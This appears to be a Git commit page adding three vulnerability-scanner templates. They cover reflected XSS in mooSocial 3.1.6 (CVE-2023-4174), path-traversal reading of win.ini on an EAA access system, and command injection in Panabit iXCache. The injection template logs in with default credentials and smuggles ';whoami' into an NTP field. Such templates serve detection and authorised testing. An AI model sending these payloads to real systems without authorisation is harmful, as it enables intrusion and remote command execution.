Merge pull request #7889 from momika233/main
CVE-2023-4174/CVE-2023-4173/TerraMaster-RCE/panabit-ixcache-date-config-rcepatch-1
commit
864154f8a5
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2023-4174
|
||||
|
||||
info:
|
||||
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
|
||||
author: momika233
|
||||
severity: medium
|
||||
description: |
|
||||
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/51671
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
|
||||
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
|
||||
metadata:
|
||||
max-request: 5
|
||||
verified: true
|
||||
fofa-query: icon_hash="702863115"
|
||||
tags: cve,cve2023,moosocial,xss
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
|
||||
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
|
||||
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
|
||||
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
|
||||
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<img src=a onerror=alert(document.domain)>ridxm"
|
||||
- "mooSocial"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -0,0 +1,41 @@
|
|||
id: eaa-app-lfi
|
||||
|
||||
info:
|
||||
name: EAA Application Access System - Arbitary File Read
|
||||
author: momika233
|
||||
severity: high
|
||||
description: |
|
||||
There is an arbitrary file reading vulnerability in the VA virtual application platform of Tingzhi Technology, through which an attacker can obtain sensitive information in the server.
|
||||
reference:
|
||||
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%9C%86%E6%99%BA%E7%A7%91%E6%8A%80%20VA%E8%99%9A%E6%8B%9F%E5%BA%94%E7%94%A8%E5%B9%B3%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
fofa-query: body="EAA益和应用接入系统"
|
||||
tags: eaa,lfi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/octet-stream"
|
||||
- "filename=win.ini"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,57 @@
|
|||
id: panabit-ixcache-rce
|
||||
|
||||
info:
|
||||
name: Panabit iXCache date_config - Remote Code Execution
|
||||
author: momika233
|
||||
severity: critical
|
||||
description: |
|
||||
Panabit iXCache date_config module has command splicing, resulting in the execution of arbitrary commands.
|
||||
reference:
|
||||
- https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
|
||||
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/Panabit/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
fofa-qeury: title="iXCache"
|
||||
veified: true
|
||||
max-request: 2
|
||||
tags: panabit,rce,ixcache,intrusive
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /login/userverify.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
POST /cgi-bin/Maintain/date_config HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
ntpserver=0.0.0.0;whoami&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1
|
||||
|
||||
cookie-reuse: true
|
||||
attack: pitchfork
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- ixcache
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue